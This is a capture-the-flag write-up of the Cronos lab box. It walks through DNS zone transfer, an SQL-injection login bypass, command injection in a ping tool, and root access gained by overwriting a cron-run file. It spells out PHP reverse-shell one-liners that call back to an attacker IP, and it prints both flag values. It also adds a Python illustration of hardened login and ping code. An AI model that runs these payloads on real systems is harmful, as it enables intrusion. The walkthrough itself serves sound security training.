CRONOS 10.10.10.13 Write Up
Machine created by ch4p
Tools used for enumeration:
1. nmap
2. nslookup
3. dig
Tools used for exploitation:
1. netcat
Steps for primary enumeration:
1. First we use nmap (a network mapping tool) to scan the box IP. Running it gives us a list of open ports and the services running on them. On the Cronos box the open ports and services are port 22 for SSH, port 53 for a nameserver and port 80 for an Apache 2.4.18 HTTP server. Command used: nmap -A 10.10.10.8
2. Port 80 shows a default Apache page. After some testing I thought about port 53 (the nameserver), so I tried nslookup and got a domain name. Command used: nslookup
3. A zone transfer with dig gave us some subdomains. Command used: dig axfr @10.10.10.13 cronos.htb
4. Point all the domains to 10.10.10.13 using /etc/hosts. Now opening admin.cronos.htb shows a login page.
Steps to get user.txt:
1. A simple SQLi payload "admin' #" in the username field leads to a login bypass. Now we have a tool to traceroute and ping.
2. The simple payload "hackproof.tech;whoami" shows that the tool is vulnerable to command injection.
3. Using the PHP reverse shell payload "8.8.8.8;php -r '$sock=fsockopen("10.10.14.3",1337);exec("/bin/bash -i <&3 >&3 2>&3");'" in the tool gives a shell in my netcat listener. Got the payload from https://github.com/ZishanAdThandar/pentest/blob/master/shell/README.md. You can use a Python payload to get a reverse shell instead.
4. Now we can go to the user's home folder as "www-data" to get user.txt. Command used: "cat /home/noulis/user.txt".
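The two input-handling flaws used above, a login query built by string concatenation and a ping/traceroute tool that hands its argument to a shell, are shown here beside their hardened forms. This is an added Python illustration, not code from the box or from the write-up: the users table, the make_demo_db helper, the login_safe / ping_safe names and the runner parameter are all assumptions made for the demo. The demo database is SQLite, whose line-comment token is -- rather than the # that the MySQL payload above relies on, so the unsafe-login demonstration uses admin' --; the parameterised query and the host validation are the general fix either way.

```python
import ipaddress
import re
import sqlite3
import subprocess

# ---- login: concatenated SQL beside a parameterised query ----------------------

def build_login_query_unsafe(username, password):
    """The pattern behind the bypass: user input spliced into the query text.
    A quote plus a comment token in the username discards the password check.
    Returned as a string so it can be inspected without running it."""
    return f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"


def make_demo_db():
    """Constructed in-memory users table (demo data, not the box's database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def login_unsafe(conn, username, password):
    """Executes the concatenated query; accepts a comment-terminated username."""
    return conn.execute(build_login_query_unsafe(username, password)).fetchone() is not None


def login_safe(conn, username, password):
    """Bound parameters: the input is data, never query syntax."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchone()
    return row is not None


# ---- ping tool: shell string beside argv with an allow-list on the target -------

# Syntactic hostname: labels of letters, digits and hyphens, 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_target(value):
    """Accept only an IP literal or a plain hostname; ';', spaces and quotes never pass."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def build_ping_unsafe(target):
    """The vulnerable pattern: one shell string, so ';' starts a second command.
    Returned as a string; never executed here."""
    return f"ping -c 1 {target}"


def ping_safe(target, runner=subprocess.run):
    """Validate first, then pass an argv list so no shell parses the target."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return runner(["ping", "-c", "1", target], capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    conn = make_demo_db()
    print(build_login_query_unsafe("admin' #", "x"))
    print("safe login with injected username:", login_safe(conn, "admin' #", "x"))
    for target in ("8.8.8.8", "hackproof.tech;whoami"):
        print(target, "->", "accepted" if is_valid_target(target) else "rejected")
```

ping_safe takes a runner argument so the validation path can be exercised without a network or a ping binary; in production it is simply subprocess.run with an argv list, never shell=True.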
Steps to get root.txt:
1. Based on the machine name I checked cron jobs first with the "cat /etc/crontab" command, and it shows that "/var/www/laravel/artisan" is run from cron and is vulnerable, so I inserted a PHP reverse shell into it to get a shell in another netcat listener.
Shell code used: <?php $sock=fsockopen('10.10.14.3', 31337);exec('/bin/bash -i <&3 >&3 2>&3'); ?>
Command used to write the shell: echo "<?php \$sock=fsockopen(\"10.10.14.3\",31337);exec(\"/bin/bash -i <&3 >&3 2>&3\"); ?>" > /var/www/laravel/artisan
2. Now go to the root folder and get root.txt. Command used: "cat /root/root.txt"
Flags:
1. user.txt flag: 51d236438b333970dbba7dc3089be33b
2. root.txt flag: 1703b8a3c9a8dde879942c79d02fd3a0
Why the hell are you pasting the full content of the flags? Ridiculous.